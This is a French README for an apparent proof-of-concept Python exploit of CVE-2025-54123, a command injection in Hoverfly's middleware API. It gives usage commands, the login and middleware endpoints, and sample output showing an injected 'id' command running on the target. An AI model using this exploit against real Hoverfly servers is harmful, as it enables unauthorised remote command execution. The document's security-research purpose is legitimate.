
Preuve de concept en Python pour CVE-2025-54123, démontrant une injection de commande menant à une RCE dans l'API middleware Hoverfly avec authentification par identifiants ou par jeton.
Ce dépôt contient un script Python de proof-of-concept (PoC) pour interagir avec les instances Hoverfly affectées par CVE-2025-54123.
Le script prend en charge :
Avertissement
Ce projet est destiné uniquement à la recherche en sécurité autorisée, aux tests et à des fins éducatives. Ne l'utilisez pas contre des systèmes sans autorisation explicite.
Installer les dépendances :
pip install requests
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
-u admin \
-p password \
--cmd "id"
python CVE-2025-54123.py \
--target example.com \
--port 8888 \
--token <ACCESS_TOKEN> \
--cmd "id"
| Argument | Description |
|---|---|
--target | Domaine cible ou adresse IP |
--port | Port du service cible |
-u | Nom d'utilisateur Hoverfly |
-p | Mot de passe Hoverfly |
--token | Token bearer existant |
--cmd | Chaîne de commande fournie au point de terminaison middleware |
Lorsque des identifiants sont fournis :
/api/token-auth
Le script communique avec :
/api/v2/hoverfly/middleware
à l'aide d'une requête PUT authentifiée.
Approaching target : example.com
Attempting login to http://example.com:8888/api/token-auth
Checking Credentials....
Login Successful!
Injected : id
uid=1000(user) gid=1000(user)
.
├── CVE-2025-54123.py
└── README.md
Ce dépôt est fourni uniquement à des fins éducatives, de sécurité défensive et de tests autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques découlant de l'utilisation de ce logiciel.